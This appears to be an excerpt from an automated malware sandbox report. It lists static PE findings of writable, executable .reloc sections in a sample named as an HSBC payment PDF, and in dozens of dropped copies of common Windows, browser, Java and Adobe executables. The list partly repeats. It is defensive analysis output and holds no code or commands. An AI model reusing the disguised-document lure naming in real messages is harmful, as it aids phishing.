                  Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: FXSSVC.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe0.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SensorDataService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: private_browsing.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: updater.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateCore.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateOnDemand.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jabswitch.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java-rmi.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javacpl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Au3Info.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Au3Info_x64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jjs.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3Help.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3_x64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SciTE.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AdobeARMHelper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jaureg.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jp2launcher.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: keytool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: kinit.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: klist.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ktab.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: orbd.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pack200.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: policytool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmid.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmiregistry.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: snmptrap.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Spectrum.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssh-agent.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: TieringEngineService.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AgentService.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: vds.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: VSSVC.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wbengine.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: servertool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssvagent.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: tnameserv.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: unpack200.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ie_to_edge_stub.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: cookie_exporter.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: identity_helper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: setup.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedgewebview2.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedge_proxy.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: WmiApSrv.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wmpnetwk.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SearchIndexer.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7z.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7zFM.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7zG.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Acrobat.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcrobatInfo.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: notification_click_helper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pwahelper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedge_proxy.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pwahelper.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdate.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateCore.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateOnDemand.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: acrobat_sl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroCEF.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SingleClientServicesUpdater.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroCEF.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msdtc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msiexec.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: PerceptionSimulationService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: perfhost.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Locator.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MsSense.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: FXSSVC.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe0.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SensorDataService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: private_browsing.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: updater.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateCore.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateOnDemand.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jabswitch.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java-rmi.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javacpl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Au3Info.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Au3Info_x64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jjs.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3Help.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
